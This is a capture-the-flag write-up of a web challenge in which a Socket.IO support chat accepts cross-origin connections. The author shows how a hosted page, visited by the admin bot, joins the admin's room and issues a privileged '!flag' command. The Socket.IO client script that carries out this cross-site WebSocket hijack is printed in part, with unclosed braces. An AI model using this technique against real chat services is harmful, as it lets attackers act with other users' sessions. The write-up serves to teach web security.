Tags: socket.io csrf web 


First, we can register with any username/password combo.

Then, we are presented with a chatbot:

Bot: Welcome to the support chat! An admin will be assisting you.

If we look at the source code of the site, we find that it is based on Socket.IO.

Trying to impersonate another user (by changing the `room` that is sent to the server) does not work since it looks like the server validates our cookie before it lets us join.

Now, let's try enumerate the things that the chatbot lets us do

We try to spam some random things:
User: random
Admin: Sorry, I can't help you if you don't provide context. Where is the error happening?

We also notice that there is a `!flag` command:

User: !flag
Bot: Only the admin can run that command from our office

This implies that part of the vulnerability will involve some kind of XSS or CSRF.

After trying a few random guesses, we notice that putting a link in causes the admin to try to visit that link:
User: https://example.com
Admin: I am looking into https://example.com give me a moment...

Thus, the vulnerability is probably something to do with CSRF.

We can try just connecting to the Socket.IO server from another origin, which does work.

So now all we need to do is to host a script that runs `!flag`:
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
let socket = io('http://six.jh2i.com:50022/test');

const username = 'admin'

socket.on('connect', () => {
socket.emit('join', {
room: username
socket.emit('my_room_event', {
data: '!flag',
room: username


After giving the admin the URL, we see the flag magically come back to us in the chatroom.